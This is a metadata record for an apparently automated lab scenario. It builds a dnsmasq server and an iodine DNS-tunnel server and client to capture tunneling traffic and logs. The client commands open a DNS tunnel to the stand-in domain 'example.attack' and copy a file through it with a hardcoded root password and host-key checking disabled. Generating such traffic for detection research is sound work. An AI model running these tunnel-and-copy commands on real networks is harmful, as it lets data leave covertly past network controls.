.metadata

execution_time: 2022-03-31 09:14:08.195622

variables: {"record_type": "null", "encoding": "raw", "passphrase": "0xDEADBEEF"}

scenario: {"name": "DNS Tunnel Scenario", "description": "\"This Scenario runs through multiple DNS tunneling \"\n", "provisioner": "vagrant", "use_default_templates": true, "components": [{"name": "DNSMASQ", "ipv4_address": "192.168.0.10", "description": "Installation of DNSMASQ DNS server.", "image": "ubuntu/focal64", "setup": {"type": "script", "val": "dnsmasq.bash"}, "run": {"type": "shell", "val": "systemctl stop systemd-resolved; systemctl restart dnsmasq;"}, "artifacts_to_collect": [{"type": "pcap", "val": ["tcpdump -i any -n -t -w /tmp/dns.pcap port 53"]}, {"type": "files", "val": ["/var/log/dnsmasq.log", "/tmp/dns.pcap", "/tmp/filebeat.json*"]}, {"type": "filebeat", "val": ["/var/log/dnsmasq.log"]}]}, {"name": "iodine_server", "ipv4_address": "192.168.0.20", "description": "This sets up the IODINE server.", "image": "ubuntu/focal64", "setup": {"type": "ansible", "val": "iodine_server_setup"}, "run": {"type": "shell", "val": "nohup asciinema rec /tmp/iodine_server_null_raw_0xDEADBEEF.cast -c \\'set -x; iodined -4 -c -f 10.0.0.1 example.attack -P 0xDEADBEEF & sleep 1\\'"}, "artifacts_to_collect": [{"type": "files", "val": ["/tmp/*.cast"]}]}, {"name": "iodine_client", "ipv4_address": "192.168.0.30", "description": "This sets up the IODINE client.", "image": "ubuntu/focal64", "setup": {"type": "script", "val": "iodine_client_setup.bash"}, "run": {"type": "shell", "val": "set -x; (iodine -4 -f -P 0xDEADBEEF -Tnull -Oraw -r 192.168.0.10 example.attack) & sleep 20; rsync -P --rsh=\"sshpass -p root ssh -l root -oStrictHostKeyChecking=no\" 10.0.0.1:/root/test-file /tmp/"}, "artifacts_to_collect": [{"type": "files", "val": ["/tmp/*.cast"]}, {"type": "cli_recording", "val": ["/tmp/iodine_client_null_raw_0xDEADBEEF.cast"]}], "depends_on": ["dns_attack_server", "dns_server"]}]}